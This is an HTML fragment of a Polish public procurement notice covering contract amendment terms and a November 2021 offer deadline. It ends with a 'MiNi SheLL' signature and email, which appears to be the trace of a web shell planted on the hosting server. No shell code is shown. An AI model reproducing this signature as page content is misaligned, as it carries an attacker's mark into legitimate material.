UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony dopuszczają zmiany umowy w zakresie:<br/>1) zmiany cen na korzystniejsze dla Zamawiającego; <br/>2) w przypadku wstrzymania lub zakończenia produkcji towarów będących przedmiotem dostawy, możliwość dostarczania odpowiedników towarów objętych umową, o parametrach nie gorszych niż towary objęte ofertą, przy zachowaniu ceny ofertowej dla danego towaru, na podstawie pisemnego wniosku Wykonawcy pod warunkiem uzyskania zgody Zamawiającego, wyrażonej w formie pisemnej, pod rygorem nieważności wymagają aneksowania umowy;<br/>2. Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej (za wyjątkiem określonym w ust. 1 pkt 1) i nie mogą być niekorzystne dla Zamawiającego.<br/>3. Strony dopuszczają zmianę umowy w zakresie podatku VAT z mocą obowiązują od wejścia w życie nowych stawek tego podatku na zasadzie prawa powszechnie obowiązującego przy zachowaniu niezmiennej ceny netto. Zmiana w tym przypadku nastąpi automatycznie co oznacza, że nie wymaga formy pisemnego aneksu do umowy. <br/>4. Aneks zostanie sporządzony przez Wykonawcę i przesłany z co najmniej 7 – dniowym wyprzedzeniem do Zamawiającego w celu zapoznania się z jego treścią i jej zaakceptowania.<br/>5. Postanowienia umowy nie mogą ulec zmianie, chyba że konieczność wprowadzenia takich zmian wynika z nadzwyczajnych okoliczności, których nie można było przewidzieć w chwili jej zawarcia.<br/>6. Wszelkie zmiany i uzupełnienia umowy, wymagają pod rygorem nieważności, formy pisemnego aneksu z zastrzeżeniem ust. 3. <br/>7. Zmiana umowy jest możliwa tylko w zakresie określonym w ust. 1 i wynikającym z treści art. 455 ustawy prawo zamówień publicznych, tj. w przypadku konieczności dokonania zmian treści umowy w związku ze zmianą powszechnie obowiązujących przepisów prawa, w zakresie wyznaczonym przepisami prawa w celu doprowadzenia umowy do stanu zgodnego z przepisami prawa.<br/>8. W szczególności nie stanowi zmiany umowy w rozumieniu art. 455 ustawy prawo zamówień publicznych (mogą one zostać dokonane w drodze jednostronnego oświadczenia strony której danych zmiana dotyczy). <br/>1) danych kontaktowych, <br/>2) elementów formalnych umowy,<br/>3) numeru rachunku bankowego, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za posrednictwem Platformy, działającej pod adresem: http://platformazakupowa.pl/pn/promedica_elk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-30 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com